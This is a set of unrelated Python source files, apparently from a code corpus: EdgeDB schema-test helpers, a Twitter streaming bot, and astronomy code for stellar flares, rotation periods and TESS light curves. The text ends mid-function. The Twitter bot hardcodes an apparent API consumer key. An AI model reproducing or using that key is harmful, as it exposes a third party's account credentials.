class BaseDocTest(unittest.TestCase, metaclass=DocTestMeta):
parser_debug_flag = ''
re_filter: Optional[typing.Pattern[str]] = None
def _run_test(self, *, source, spec=None, expected=None):
if spec and 'must_fail' in spec:
spec_args, spec_kwargs = spec['must_fail']
if len(spec_args) == 1:
assertRaises = self.assertRaises
else:
assertRaises = self.assertRaisesRegex
with assertRaises(*spec_args) as cm:
return self.run_test(source=source, spec=spec,
expected=expected)
if cm.exception:
exc = cm.exception
for attr_name, expected_val in spec_kwargs.items():
val = getattr(exc, attr_name)
if val != expected_val:
raise AssertionError(
f'must_fail: attribute {attr_name!r} is '
f'{val} (expected is {expected_val!r})') from exc
else:
return self.run_test(source=source, spec=spec, expected=expected)
def run_test(self, *, source, spec, expected=None):
raise NotImplementedError
def assert_equal(
self,
expected,
result,
*,
re_filter: Optional[str] = None,
message: Optional[str] = None
) -> None:
if re_filter is None:
re_filter = self.re_filter
if re_filter is not None:
expected_stripped = re_filter.sub('', expected).lower()
result_stripped = re_filter.sub('', result).lower()
else:
expected_stripped = expected.lower()
result_stripped = result.lower()
self.assertEqual(
expected_stripped,
result_stripped,
(f'{message if message else ""}' +
f'\nexpected:\n{expected}\nreturned:\n{result}')
)
class BaseSyntaxTest(BaseDocTest):
ast_to_source: Optional[Any] = None
markup_dump_lexer: Optional[str] = None
def get_parser(self, *, spec):
raise NotImplementedError
def run_test(self, *, source, spec, expected=None):
debug = bool(os.environ.get(self.parser_debug_flag))
if debug:
markup.dump_code(source, lexer=self.markup_dump_lexer)
p = self.get_parser(spec=spec)
inast = p.parse(source)
if debug:
markup.dump(inast)
# make sure that the AST has context
#
context.ContextValidator().visit(inast)
processed_src = self.ast_to_source(inast)
if debug:
markup.dump_code(processed_src, lexer=self.markup_dump_lexer)
expected_src = source if expected is None else expected
self.assert_equal(expected_src, processed_src)
class AstValueTest(BaseDocTest):
def run_test(self, *, source, spec=None, expected=None):
debug = bool(os.environ.get(self.parser_debug_flag))
if debug:
markup.dump_code(source, lexer=self.markup_dump_lexer)
p = self.get_parser(spec=spec)
inast = p.parse(source)
if debug:
markup.dump(inast)
for var in inast.definitions[0].variables:
asttype, val = expected[var.name]
self.assertIsInstance(var.value, asttype)
self.assertEqual(var.value.value, val)
_std_schema = None
_refl_schema = None
_schema_class_layout = None
def _load_std_schema():
global _std_schema
if _std_schema is None:
std_dirs_hash = buildmeta.hash_dirs(s_std.CACHE_SRC_DIRS)
schema = None
if devmode.is_in_dev_mode():
schema = buildmeta.read_data_cache(
std_dirs_hash, 'transient-stdschema.pickle')
if schema is None:
schema = s_schema.FlatSchema()
for modname in s_schema.STD_SOURCES:
schema = s_std.load_std_module(schema, modname)
schema, _ = s_std.make_schema_version(schema)
schema, _ = s_std.make_global_schema_version(schema)
if devmode.is_in_dev_mode():
buildmeta.write_data_cache(
schema, std_dirs_hash, 'transient-stdschema.pickle')
_std_schema = schema
return _std_schema
def _load_reflection_schema():
global _refl_schema
global _schema_class_layout
if _refl_schema is None:
std_dirs_hash = buildmeta.hash_dirs(s_std.CACHE_SRC_DIRS)
cache = None
if devmode.is_in_dev_mode():
cache = buildmeta.read_data_cache(
std_dirs_hash, 'transient-reflschema.pickle')
if cache is not None:
reflschema, classlayout = cache
else:
std_schema = _load_std_schema()
reflection = s_refl.generate_structure(std_schema)
classlayout = reflection.class_layout
context = sd.CommandContext()
context.stdmode = True
reflschema = reflection.intro_schema_delta.apply(
std_schema, context)
if devmode.is_in_dev_mode():
buildmeta.write_data_cache(
(reflschema, classlayout),
std_dirs_hash,
'transient-reflschema.pickle',
)
_refl_schema = reflschema
_schema_class_layout = classlayout
return _refl_schema, _schema_class_layout
def new_compiler():
std_schema = _load_std_schema()
refl_schema, layout = _load_reflection_schema()
return edbcompiler.new_compiler(
std_schema=std_schema,
reflection_schema=refl_schema,
schema_class_layout=layout,
)
class BaseSchemaTest(BaseDocTest):
DEFAULT_MODULE = 'default'
SCHEMA: Optional[str] = None
schema: s_schema.Schema
@classmethod
def setUpClass(cls):
script = cls.get_schema_script()
if script is not None:
cls.schema = cls.run_ddl(_load_std_schema(), script)
else:
cls.schema = _load_std_schema()
@classmethod
def run_ddl(cls, schema, ddl, default_module=defines.DEFAULT_MODULE_ALIAS):
statements = edgeql.parse_block(ddl)
current_schema = schema
target_schema = None
migration_schema = None
migration_target = None
migration_script = []
for stmt in statements:
if isinstance(stmt, qlast.StartMigration):
# START MIGRATION
if target_schema is None:
target_schema = _load_std_schema()
migration_target = s_ddl.apply_sdl(
stmt.target,
base_schema=target_schema,
current_schema=current_schema,
testmode=True,
)
migration_schema = current_schema
ddl_plan = None
elif isinstance(stmt, qlast.PopulateMigration):
# POPULATE MIGRATION
if migration_target is None:
raise errors.QueryError(
'unexpected POPULATE MIGRATION:'
' not currently in a migration block',
context=stmt.context,
)
migration_diff = s_ddl.delta_schemas(
migration_schema,
migration_target,
)
if debug.flags.delta_plan:
debug.header('Populate Migration Diff')
debug.dump(migration_diff, schema=schema)
new_ddl = s_ddl.ddlast_from_delta(
migration_schema,
migration_target,
migration_diff,
)
migration_script.extend(new_ddl)
if debug.flags.delta_plan:
debug.header('Populate Migration DDL AST')
text = []
for cmd in new_ddl:
debug.dump(cmd)
text.append(edgeql.generate_source(cmd, pretty=True))
debug.header('Populate Migration DDL Text')
debug.dump_code(';\n'.join(text) + ';')
elif isinstance(stmt, qlast.CommitMigration):
if migration_target is None:
raise errors.QueryError(
'unexpected COMMIT MIGRATION:'
' not currently in a migration block',
context=stmt.context,
)
last_migration = current_schema.get_last_migration()
if last_migration:
last_migration_ref = s_utils.name_to_ast_ref(
last_migration.get_name(current_schema),
)
else:
last_migration_ref = None
create_migration = qlast.CreateMigration(
body=qlast.NestedQLBlock(commands=migration_script),
parent=last_migration_ref,
)
ddl_plan = s_ddl.delta_from_ddl(
create_migration,
schema=migration_schema,
modaliases={None: default_module},
testmode=True,
)
if debug.flags.delta_plan:
debug.header('Delta Plan')
debug.dump(ddl_plan, schema=schema)
migration_schema = None
migration_target = None
migration_script = []
elif isinstance(stmt, qlast.DDL):
if migration_target is not None:
migration_script.append(stmt)
ddl_plan = None
else:
ddl_plan = s_ddl.delta_from_ddl(
stmt,
schema=current_schema,
modaliases={None: default_module},
testmode=True,
)
if debug.flags.delta_plan:
debug.header('Delta Plan')
debug.dump(ddl_plan, schema=schema)
else:
raise ValueError(
f'unexpected {stmt!r} in compiler setup script')
if ddl_plan is not None:
context = sd.CommandContext()
context.testmode = True
current_schema = ddl_plan.apply(current_schema, context)
return current_schema
@classmethod
def load_schema(
cls, source: str, modname: Optional[str]=None) -> s_schema.Schema:
if not modname:
modname = cls.DEFAULT_MODULE
sdl_schema = qlparser.parse_sdl(f'module {modname} {{ {source} }}')
schema = _load_std_schema()
return s_ddl.apply_sdl(
sdl_schema,
base_schema=schema,
current_schema=schema,
)
@classmethod
def get_schema_script(cls):
script = ''
# look at all SCHEMA entries and potentially create multiple modules
schema = []
for name, val in cls.__dict__.items():
m = re.match(r'^SCHEMA(?:_(\w+))?', name)
if m:
module_name = (m.group(1)
or 'default').lower().replace('__', '.')
if '\n' in val:
# Inline schema source
module = val
else:
with open(val, 'r') as sf:
module = sf.read()
schema.append(f'\nmodule {module_name} {{ {module} }}')
if schema:
script += f'\nSTART MIGRATION'
script += f' TO {{ {"".join(schema)} }};'
script += f'\nPOPULATE MIGRATION;'
script += f'\nCOMMIT MIGRATION;'
return script.strip(' \n')
class BaseSchemaLoadTest(BaseSchemaTest):
def run_test(self, *, source, spec, expected=None):
self.load_schema(source)
class BaseEdgeQLCompilerTest(BaseSchemaTest):
@classmethod
def get_schema_script(cls):
script = super().get_schema_script()
if not script:
raise ValueError(
'compiler test cases must define at least one '
'schema in the SCHEMA[_MODNAME] class attribute.')
return script
```
#### File: edb/tools/gen_cast_table.py
```python
from __future__ import annotations
import sys
from edb.tools.edb import edbcommands
from edb.server import defines as edgedb_defines
import edgedb
# Hardcode the scalar types (and the order of their appearance in
# the table), because it's hard to group them otherwise.
SCALARS = [
'std::json',
'std::str',
'std::float32',
'std::float64',
'std::int16',
'std::int32',
'std::int64',
'std::bigint',
'std::decimal',
'std::bool',
'std::bytes',
'std::uuid',
'std::datetime',
'std::duration',
'cal::local_date',
'cal::local_datetime',
'cal::local_time',
]
SCALAR_SET = set(SCALARS)
def die(msg):
print(f'FATAL: {msg}', file=sys.stderr)
sys.exit(1)
def get_casts_to_type(target, impl_cast):
results = []
for source in SCALARS:
cast = (source, target)
if impl_cast.get(cast):
results.append(cast)
return results
def is_reachable(source, target, impl_cast):
if source == target:
return True
casts = get_casts_to_type(target, impl_cast)
if not casts:
return False
sources = {c[0] for c in casts}
if source in sources:
return True
else:
reachable = any(is_reachable(source, s, impl_cast) for s in sources)
if reachable:
impl_cast[(source, target)] = True
return reachable
def get_all_casts(con):
# Read the casts.
casts = con.query('''
WITH MODULE schema
SELECT Cast {
source := .from_type.name,
target := .to_type.name,
allow_assignment,
allow_implicit,
}
FILTER .from_type IS ScalarType AND .to_type IS ScalarType
''')
# Calculate the explicit, assignment, and implicit cast tables.
expl_cast = {}
assn_cast = {}
impl_cast = {}
for cast in casts:
source = cast.source
target = cast.target
if source in SCALAR_SET and target in SCALAR_SET:
expl_cast[(source, target)] = True
if cast.allow_assignment:
assn_cast[(source, target)] = True
if cast.allow_implicit:
assn_cast[(source, target)] = True
impl_cast[(source, target)] = True
# Implicit cast table needs to be recursively expanded from the
# starting casts.
for source in SCALARS:
for target in SCALARS:
is_reachable(source, target, impl_cast)
return (expl_cast, assn_cast, impl_cast)
def main(con):
expl_cast, assn_cast, impl_cast = get_all_casts(con)
# Top row with all the scalars listed
code = []
line = ['from \\\\ to']
for target in SCALARS:
line.append(f':eql:type:`{target.split("::")[1]} <{target}>`')
code.append(','.join(line))
for source in SCALARS:
line = [f':eql:type:`{source.split("::")[1]} <{source}>`']
for target in SCALARS:
val = ''
if impl_cast.get((source, target)):
val = 'impl'
elif assn_cast.get((source, target)):
val = '``:=``'
elif expl_cast.get((source, target)):
val = '``<>``'
line.append(val)
code.append(','.join(line))
code = '\n'.join(code) + '\n'
print(code, end='')
@edbcommands.command('gen-cast-table')
def gen_cast_table():
"""Generate a table of scalar casts to be used in the documentation.
NAME - at the moment there's only one option 'edgeql'
"""
con = None
try:
con = edgedb.connect(user=edgedb_defines.EDGEDB_SUPERUSER,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
port=5656)
main(con)
except Exception as ex:
die(str(ex))
finally:
if con is not None:
con.close()
``` |
{
"source": "jrach190/mangohacks2016",
"score": 3
} |
#### File: jrach190/mangohacks2016/twitter_bot.py
```python
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
ckey = 'U9Tafmmex2480HX7rk0WBlxVz'
csecret = '<KEY>'
atoken = '<KEY>'
asecret = '<KEY>'
class listener(StreamListener):
def on_data(self, data):
saveFile = open('twitDb.csv','a')
saveFile.write(data)
saveFile.write('\n')
saveFile.close()
tweet = data.split(',"text":"')[1]
tweet = tweet.split('","source":"')[0]
time = data.split
print (tweet)
return True
def on_error(self, status):
print (status)
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, listener())
twitterStream.filter(track=["cat"])
``` |
{
"source": "jradavenport/appaloosa",
"score": 3
} |
#### File: appaloosa/appaloosa/analysis.py
```python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import LogNorm
import matplotlib
import os
import sys
import appaloosa
import pandas as pd
import datetime
import warnings
from scipy.optimize import curve_fit, minimize
from astropy.stats import funcs
import emcee
import corner
# from scipy.stats import binned_statistic_2d
# from os.path import expanduser
matplotlib.rcParams.update({'font.size':18})
matplotlib.rcParams.update({'font.family':'serif'})
def _ABmag2flux(mag, zeropt=48.60,
wave0=6400.0, fwhm=4000.0):
'''
Replicate the IDL procedure:
http://idlastro.gsfc.nasa.gov/ftp/pro/astro/mag2flux.pro
flux = 10**(-0.4*(mag +2.406 + 4*np.log10(wave0)))
Parameters set for Kepler band specifically
e.g. see http://stev.oapd.inaf.it/~lgirardi/cmd_2.7/photsys.html
'''
c = 2.99792458e18 # speed of light, in [A/s]
# standard equation from Oke & Gunn (1883)
# has units: [erg/s/cm2/Hz]
f_nu = 10.0 ** ( (mag + zeropt) / (-2.5) )
# has units of [erg/s/cm2/A]
f_lambda = f_nu * c / (wave0**2.0)
# Finally: units of [erg/s/cm2]
flux = f_lambda * fwhm
# now all we'll need downstream is the distance to get L [erg/s]
return flux
def _tau(mass):
'''
Write up the Eqn 11 from Wright (2011) that gives the
convective turnover timescale, used in Rossby number calculation
(Ro = Prot / tau)
Parameters
----------
mass : float
relative to solar
Returns
-------
tau (in days)
'''
log_tau = 1.16 - 1.49 * np.log10(mass) - 0.54 * np.log10(mass)**2.
return 10.**log_tau
def RoFlare(r,a,b,s):
'''
The piecewise function that has a saturated and decaying regime
Parameters
----------
r : the log Ro value
a : the amplitude
b : the break Ro
s : the slope
Returns
-------
'''
f = np.piecewise(r, [(r <= b), (r > b)],
[a, # before the break, it is flat
lambda x: (s * (x-b) + a)])
return f
def _Perror(n, full=False, down=False):
'''
Calculate the asymmetric Poisson error, using Eqn 7
and Eqn 12 in Gehrels 1986 ApJ, 3030, 336
Parameters
----------
n
full
Returns
-------
'''
err_up = err_dn = np.sqrt(n + 0.75) + 1.0 # this is the default behavior for N=0
xn = np.where((n > 0))[0]
if np.size(xn) > 0:
err_dn[xn] = np.abs(n[xn] * (1.-1./(9. * n[xn])-1./(3.*np.sqrt(n[xn])))**3.-n[xn])
err_up[xn] = n[xn] + np.sqrt(n[xn] + 0.75) + 1.0 - n[xn]
# else:
# err_up = np.sqrt(n + 0.75) + 1.0
# err_dn = err_up
# # err_up = err_dn = np.nan
if full is True:
return err_dn, err_up
else:
if down is True:
return err_dn
else:
return err_up
def _DistModulus(m_app, M_abs):
'''
Trivial wrapper to invert the classic equation:
m - M = 5 log(d) - 5
Parameters
----------
m_app
apparent magnitude
M_abs
absolute magnitude
Returns
-------
distance, in pc
'''
mu = m_app - M_abs
dist = 10.0**(mu/5.0 + 1.0)
return dist
def _linfunc(x, m, b):
'''
A simple linear function to fit with curve_fit
'''
return m * x + b
def _plaw(x, m, b):
'''
a powerlaw function
'''
x2 = 10.**x
return b * (x2**m)
def Angus2015(B_V, age):
'''
Compute the rotation period expected for a star of a given color (temp) and age
NOTE: - input Age is in MYr
- output Period is in days
Eqn 15 from Angus+2015
http://adsabs.harvard.edu/abs/2015MNRAS.450.1787A
'''
P = (age ** 0.55) * 0.4 * ((B_V - 0.45) ** 0.31)
return P
def Angus2015_age(B_V, P):
'''
Compute the rotation period expected for a star of a given color (temp) and age
NOTE: - output Age is in MYr
- input Period is in days
Eqn 15 from Angus+2015
http://adsabs.harvard.edu/abs/2015MNRAS.450.1787A
'''
# P = (age ** 0.55) * 0.4 * ((B_V - 0.45) ** 0.31)
age = np.power(P / (0.4 * ((B_V - 0.45) ** 0.31)), 1. / 0.55)
return age
def MH2008(B_V, age):
'''
Equations 12,13,14 from Mamajek & Hillenbrand (2008)
http://adsabs.harvard.edu/abs/2008ApJ...687.1264M
Coefficients from Table 10
Parameters
----------
B_V (B-V) color
age in Myr
Returns
-------
period in color
'''
a = 0.407
b = 0.325
c = 0.495
n = 0.566
f = a * np.power(B_V - c, b)
g = np.power(age, n)
P = f * g
return P
def MH2008_age(B_V, P):
'''
inverse of other function. Input color and P, output age
'''
a = 0.407
b = 0.325
c = 0.495
n = 0.566
f = a * np.power(B_V - c, b)
# g = np.power(age, n)
# P = f * g
age = np.power(P / f, 1. / n)
return age
def getBV(mass, isochrone='1.0gyr.dat'):
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
file = dir + isochrone
df = pd.read_table(file, delim_whitespace=True, comment='#',
names=('Z', 'log_age', 'M_ini', 'M_act', 'logL/Lo', 'logTe', 'logG',
'mbol', 'Kepler', 'g', 'r', 'i', 'z', 'DDO51_finf','int_IMF',
'stage', 'J', 'H', 'Ks', 'U', 'B', 'V', 'R', 'I'))
mass_iso = df['M_ini'].values
ss = np.argsort(mass_iso) # needs to be sorted for interpolation
BV_iso = df['B'].values - df['V'].values
BV = np.interp((mass), mass_iso[ss], BV_iso[ss])
return BV
def FlareEqn0(X, a1, a2, b1, b2):
'''
this is the simple FFD evolution for bins of mass,
i.e. only produce FFD model as a function of energy and age (drop mass dependence)
run on each of the (g-i) sample bins shown in paper
Parameters
----------
X = (logE, logt)
age in log Myr
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt = X
a = a1 * logt + a2
b = b1 * logt + b2
logR = logE * a + b
return logR
def FlareEqn(X, a1, a2, a3, b1, b2, b3):
'''
The big FFD fitting equation, fititng both powerlaw slope and intercept as functions of mass and age
THIS is the original version from Paper2 draft v1
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = a1 * logt + a2 * m + a3
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return logR
def FlareEqnNew(X, a1, a2, a3, b1, b2, b3):
'''
The big FFD fitting equation, fititng ONLY the powerlaw intercept as functions of mass and age
The powerlaw slope is fixed to a=-1
warning: currently requires a1,a2,a3 for backwards compatibility with the "FlareEqn" function above...
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = -1.
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return logR
def flare_lnprob(p, x, y, yerr):
N = np.size(x)
model = FlareEqn(x, *p)
return -0.5 * appaloosa.chisq(y, yerr, model)
def FlareEqn_nolog(X, a1, a2, a3, b1, b2, b3):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
Rate of flares (NOTE: not the log rate)
'''
logE, logt, m = X
a = a1 * logt + a2 * m + a3
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return 10.0 ** logR
def FlareEqn2(X, a1, a2, a3, a4, a5, a6, b1, b2):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = (a1 * logt) + (a2 * m) + (a3 * logt * m) + (a4 * logt**2) + (a5 * m**2) + a6
b = b1 * m + b2
logR = logE * a + b
return logR
def FlareEqn2_nolog(X, a1, a2, a3, a4, a5, a6, b1, b2):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = (a1 * logt) + (a2 * m) + (a3 * logt * m) + (a4 * logt**2) + (a5 * m**2) + a6
b = b1 * m + b2
logR = logE * a + b
return 10.0 ** logR
def Chi_fl(giclr):
'''
Compute the Chi_fl parameter, defined as Flux(Kepler band) / Flux (Bol)
Used to convert L_fl/L_kp to L_fl/L_bol
NOTE: only defined between 0 <= g-i <= 5,
or approximately 1.5 >= M_sun >= 0.15
Parameters
----------
giclr: float or numpy float array of the g-i stellar color
Returns
-------
Chi_fl values
'''
fit = np.array([-0.00129193, 0.02105752, -0.14589187, 0.10493256, 0.00440871])
return 10.0**np.polyval(fit, giclr)
def massL(m1=0.2, m2=1.3, dm=0.01, isochrone='1.0gyr.dat'):
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
file = dir + isochrone
df = pd.read_table(file, delim_whitespace=True, comment='#',
names=('Z', 'log_age', 'M_ini', 'M_act', 'logL/Lo', 'logTe', 'logG',
'mbol', 'Kepler', 'g', 'r', 'i', 'z', 'DDO51_finf','int_IMF',
'stage', 'J', 'H', 'Ks', 'U', 'B', 'V', 'R', 'I'))
masses = np.arange(m1, m2, dm)
mass_iso = df['M_ini'].values
ss = np.argsort(mass_iso) # needs to be sorted for interpolation
Mkp_iso = df['Kepler'].values
# BV = np.interp((mass), mass_iso[ss], BV_iso[ss])
pc2cm = 3.08568025e18
F_kp = _ABmag2flux(Mkp_iso)
L_kp = np.array(F_kp * (4.0 * np.pi * (10. * pc2cm)**2.0), dtype='float')
logLs = np.interp(masses, mass_iso[ss], np.log10(L_kp[ss]))
return masses, logLs
def energies(gmag, kmag, isochrone='1.0gyr.dat', return_all=False):
'''
Compute the quiescent energy for every star. Use the KIC (g-i) color,
with an isochrone, get the absolute Kepler mag for each star, and thus
the distance & luminosity.
Isochrone is a 1.0 Gyr track from the Padova CMD v2.7
http://stev.oapd.inaf.it/cgi-bin/cmd_2.7
Kepler and Sloan phot system both in AB mags.
Returns
-------
Quiescent Luminosities in the Kepler band
'''
# read in Padova isochrone file
# note, I've cheated and clipped this isochrone to only have the
# Main Sequence, up to the blue Turn-Off limit.
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
'''
Mkp, Mg, Mr, Mi = np.loadtxt(dir + isochrone, comments='#',
unpack=True, usecols=(8,9,10,11))
# To match observed data to the isochrone, cheat:
# e.g. Find interpolated g, given g-i. Same for Kp
# do this 3 times, each color combo. Average result for M_kp
Mgi = (Mg-Mi)
ss = np.argsort(Mgi) # needs to be sorted for interpolation
Mkp_go = np.interp((gmag-imag), Mgi[ss], Mkp[ss])
Mg_o = np.interp((gmag-imag), Mgi[ss], Mg[ss])
Mgr = (Mg-Mr)
ss = np.argsort(Mgr)
Mkp_ro = np.interp((gmag-rmag), Mgr[ss], Mkp[ss])
Mr_o = np.interp((gmag-rmag), Mgr[ss], Mr[ss])
Mri = (Mr-Mi)
ss = np.argsort(Mri)
Mkp_io = np.interp((rmag-imag), Mri[ss], Mkp[ss])
Mi_o = np.interp((rmag-imag), Mri[ss], Mi[ss])
Mkp_o = (Mkp_go + Mkp_ro + Mkp_io) / 3.0
dist_g = np.array(_DistModulus(gmag, Mg_o), dtype='float')
dist_r = np.array(_DistModulus(rmag, Mr_o), dtype='float')
dist_i = np.array(_DistModulus(imag, Mi_o), dtype='float')
dist = (dist_g + dist_r + dist_i) / 3.0
dm_g = (gmag - Mg_o)
dm_r = (rmag - Mr_o)
dm_i = (imag - Mi_o)
dm = (dm_g + dm_r + dm_i) / 3.0
'''
mass, Mkp, Mg, Mk = np.loadtxt(dir + isochrone, comments='#',
unpack=True, usecols=(2,8,9,18))
Mgk = (Mg-Mk)
ss = np.argsort(Mgk) # needs to be sorted for interpolation
Mkp_o = np.interp((gmag-kmag), Mgk[ss], Mkp[ss])
Mk_o = np.interp((gmag-kmag), Mgk[ss], Mk[ss])
mass_o = np.interp((gmag-kmag), Mgk[ss], mass[ss])
dist = np.array(_DistModulus(kmag, Mk_o), dtype='float')
dm = (kmag - Mk_o)
pc2cm = 3.08568025e18
# returns Flux [erg/s/cm^2]
F_kp = _ABmag2flux(Mkp_o + dm)
# again, classic bread/butter right here,
# change Flux to Luminosity [erg/s]
L_kp = np.array(F_kp * (4.0 * np.pi * (dist * pc2cm)**2.0), dtype='float')
# !! Should be able to include errors on (g-i), propogate to
# errors on Distance, and thus lower error limit on L_kp !!
# !! Should have some confidence about the interpolation,
# e.g. if beyond g-i isochrone range !!
if return_all is True:
return np.log10(L_kp), dist, np.array(mass_o, dtype='float')
else:
return np.log10(L_kp)
```
#### File: appaloosa/appaloosa/rayleigh.py
```python
import numpy as np
import matplotlib.pyplot as plt
def RayleighTest(t, v):
'''
Evaluate the normalized Rayleigh test for a series of event times (t)
at a single given frequency (v).
'''
n = len(t)
theta = 2. * np.pi * v * t
z = 1. / n * (( np.sum(np.sin(theta))**2 +
np.sum(np.cos(theta))**2 ))
return z
def RayleighPowerSpectrum(times, minper=1.0, maxper=500., nper=100):
'''
Compute the power spectrum over a range of periods by evaluating the
Rayleigh test at each frequency.
Periods are assumed to be in units of Days.
'''
maxfreq = 1. / (minper * 24. * 60. * 60.)
minfreq = 1. / (maxper * 24. * 60. * 60.)
# Evaluate at linearly spaced frequencies
freqs = np.linspace(minfreq, maxfreq, num=nper)
# periods = 1. / freqs / (24. * 60. * 60.)
z = map(lambda v: RayleighTest(times * (24. * 60. * 60.), v), freqs)
return z
def DrogeTest():
'''
Data from:
http://adsabs.harvard.edu/abs/1990ApJS...73..279D
Remake Figure 2 for 64 solar flare events.
'''
# Table 1, Occurance Times of ISEE 3 Electron Flares
# Units of Days since 01-AUG-1978
data = [53.415, 167.566, 201.688, 212.428, 245.049, 367.896, 382.592,
403.373, 409.292, 471.847, 498.718, 556.378, 612.627, 676.053,
676.133, 690.056, 696.676, 698.446, 716.235, 806.215, 814.439,
816.401, 836.771, 845.779, 965.282, 967.860, 974.065, 976.408,
977.208, 983.698, 987.986, 997.580, 1001.861, 1003.125, 1084.554,
1092.840, 1163.958, 1168.269, 1194.163, 1209.139, 1250.257,
1278.986, 1280.581, 1287.533, 1288.172, 1314.130, 1402.488,
1426.750, 1438.322, 1446.965, 1448.037, 1451.722, 1468.083,
1473.958, 1474.213, 1495.083, 1574.513, 1574.740, 1578.107,
1589.989, 1597.082, 1599.792, 1601.684, 1607.333]
data = np.array(data, dtype='float')
# frequency info given in nHz in the paper
fmin = 1e-9
fmax = 500e-9
df = 1.25e-9
n = int((fmax - fmin) / df)
freqs = np.linspace(fmin, fmax, num=n)
# convert those limits to Days for this code
maxper = 1. / (fmin * 24. * 60. * 60.)
minper = 1. / (fmax * 24. * 60. * 60.)
# Compute the power spectrum!
z = RayleighPowerSpectrum(data, minper=minper, maxper=maxper, nper=n)
# now recreate the actual plot from the paper
plt.figure()
plt.plot(freqs / 1e-9, z)
plt.xlabel('Frequency (nHz)')
plt.ylabel('Rayleigh power (z)')
plt.show()
return
``` |
{
"source": "jradavenport/emd",
"score": 2
} |
#### File: emd/emd/emd.py
```python
import numpy as np
from scipy.signal import argrelextrema
from scipy.interpolate import CubicSpline
def resid(t,f):
'''
Outline:
* do 1-point derivative to find local Max's and Min's
* this is point of possible improvement
* do cubic splines between Max's and Min's
* find running mean between Max and Min
* return residial
'''
maxm = argrelextrema(f, np.greater)
minm = argrelextrema(f, np.less)
maxCS = CubicSpline(t[maxm], f[maxm])
maxi = maxCS(t, extrapolate=None)
minCS = CubicSpline(t[minm], f[minm])
mini = minCS(t, extrapolate=None)
meani = (maxi + mini) / 2.0
return f - meani
def IMF(t, f, Nmax=200, SDmax=0.01, Zmax=5):
'''
compute the intrinsic mode function
'''
ftmp = f
i = 0
Zok = 0
while i<Nmax:
r1 = resid(t, ftmp)
# does the residual satisfy the 2 criteria?
# 1) Nextrema = Nzero_crossings
# 2) StdDev is lower than some threshold
SD = np.sum(np.power(np.abs(ftmp - r1), 2) / np.power(ftmp, 2))
# compute Nextrema
maxm = argrelextrema(r1, np.greater)
minm = argrelextrema(r1, np.less)
# from http://stackoverflow.com/a/30281079
Nzero = ((r1[:-1] * r1[1:]) < 0).sum()
if np.abs(Nzero - (np.size(maxm)+np.size(minm))) < 2:
Zok = Zok + 1
if SD <= SDmax:
i=Nmax
if Zok >= Zmax:
i=Nmax
i=i+1
ftmp = r1
return r1
``` |
{
"source": "jradavenport/gaia_rot",
"score": 3
} |
#### File: jradavenport/gaia_rot/from_ruth.py
```python
import numpy as np
def teff2bv(teff, logg, feh):
"""
Relation from Sekiguchi & Fukugita (2000).
original here:
https://gist.github.com/RuthAngus/53c90cb5e55b8467198d7d33a9fec424
"""
t = [-813.3175, 684.4585, -189.923, 17.40875]
f = [1.2136, 0.0209]
d1, g1, e1 = -0.294, -1.166, 0.3125
return t[0] + t[1]*np.log10(teff) + t[2]*(np.log10(teff))**2 + \
t[3]*(np.log10(teff))**3 + f[0]*feh + f[1]*feh**2 \
+ d1*feh*np.log10(teff) + g1*logg + e1*logg*np.log10(teff)
def gyro(B_V, age):
'''
Compute the rotation period expected for a star of a given color (temp) and age
NOTE: Age is in MYr
Eqn 15 from Angus+2015
'''
P = (age**0.55) * 0.4 * ((B_V - 0.45)**0.31)
return P
``` |
{
"source": "jradavenport/helloTESS",
"score": 2
} |
#### File: helloTESS/code/run_sector.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
import os
from glob import glob
import sys
import gc
from scipy.optimize import curve_fit
from astropy.table import Table
import astropy.io.fits as fits
from astropy.timeseries import LombScargle, BoxLeastSquares
import exoplanet as xo
# import pymc3 as pm
# import theano.tensor as tt
from stuff import FINDflare, EasyE, IRLSSpline
matplotlib.rcParams.update({'font.size':18})
matplotlib.rcParams.update({'font.family':'serif'})
ftype = '.pdf'
# tess_dir = '/data/epyc/data/tess/'
# tess_dir = '/Users/james/Desktop/tess/'
#
# sectors = ['sector001', 'sector002', 'sector003', 'sector004', 'sector005', 'sector006']
#
# # just in case glob wants to re-order things, be sure grab them in Sector order
# sect1 = glob(tess_dir + sectors[0] + '/*.fits', recursive=True)
# sect2 = glob(tess_dir + sectors[1] + '/*.fits', recursive=True)
# sect3 = glob(tess_dir + sectors[2] + '/*.fits', recursive=True)
# sect4 = glob(tess_dir + sectors[3] + '/*.fits', recursive=True)
# sect5 = glob(tess_dir + sectors[4] + '/*.fits', recursive=True)
# sect6 = glob(tess_dir + sectors[5] + '/*.fits', recursive=True)
#
# files = sect1 + sect2 + sect3 + sect4 + sect5 + sect6
# # make into an array for looping later!
# s_lens = [len(sect1), len(sect2), len(sect3), len(sect4), len(sect5), len(sect6)]
# print(s_lens, len(files))
def BasicActivity(sector, tess_dir = '/Users/james/Desktop/tess/',
